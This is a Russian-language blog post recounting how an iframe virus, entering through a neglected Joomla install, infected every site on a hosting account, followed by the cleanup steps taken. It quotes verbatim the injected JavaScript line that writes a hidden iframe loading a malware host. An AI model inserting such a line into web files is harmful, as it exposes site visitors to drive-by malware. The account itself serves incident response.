Данный материал посвящен Drupal косвенно. В канун Нового Года доброжелатели сделали мне подарок – iframe вирус, который распространился на все сайты аккаунта хостинга beget.ru.

Заметить, что с сайтом, что-то произошло помог браузер Google Chrome, который запрещал дальнейшему обращению к данному сайту. Chrome на все окно отобразил следующее содержание:

На эту веб-страницу было вставлено содержание с **** известного распространителя вредоносного ПО

И что не удивительно, в коде страницы был обнаружен iframe c ссылкой на этот ресурс.

Но откуда эта вставка могла появиться на моем проекте? Помимо, iframe вставки было обнаружено, что *.js файлы были изменены, в конец файлов добавлены строчки:

“;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://bxprgiui.qhigh.com/geowgjwiehgwvbb.cfg?11"></iframe>');”. 

Собственно, вот откуда взялся этот загадочный iframe. Возник следующий вопрос, откуда тогда во всех *.js, файлах возникла данная строка?

Тогда я еще не знал, что источник находится совсем не в Drupal. Недолго думая, было принято решение откатиться на более раннюю версию, благо у хостера имеются бекапы. Ну все, вируса нет, Chrome больше не ругается, разметка чистая – победа за нами. После этого было обновлено ядро Drupal до последний версии, еще раз все проверили, все чисто.

Спустя 10 минут, ко мне подходит сотрудник офиса и говорит о странном сообщении, которое все еще появляется при попытке обращения к нашему сайту. “Это кеш” – говорю ему, самонадеянно. И незаметно для него, уже открываю сайт в браузере, чтобы на всякий случай убедиться, что все хорошо. Но нет, враг не побежден, начали жаловаться и на другие сайты. Тут я понял, что справиться с таким подарком без подготовки не выйдет.

После серфинга в Google, общения с тех поддержкой, и сообществом DrupalSPB мы узнали, что проблема крылась в “забытых проектах”, на этих проектах использовалась Joomla и ,разумеется, она была не обновлена.

Таким образом, мы получили ответ на поставленный выше вопрос. Используя уязвимость безопасности устаревшей версии этой системы, на сайты были добавлены shell-скрипты, которые позволяли выполнять команды от лица веб-сервера и править все js файлы. Теперь настало время действовать:

1. Все компьютеры, которые могут подключаться по FTP к сайту, проверили антивирусом
2. Отлинковали все сайты
3. Поменяли все пароли на FTP
4. Восстановили из бекапа и обновили все сайты
5. Запустили все обратно в обычном режиме

Так же, мы больше не подключаемся к аккаунту по FTP, чтобы избежать подобных проблем.

Вирус больше нас не тревожил. Вот такая история, возможно, кому-то окажется полезной или интересной.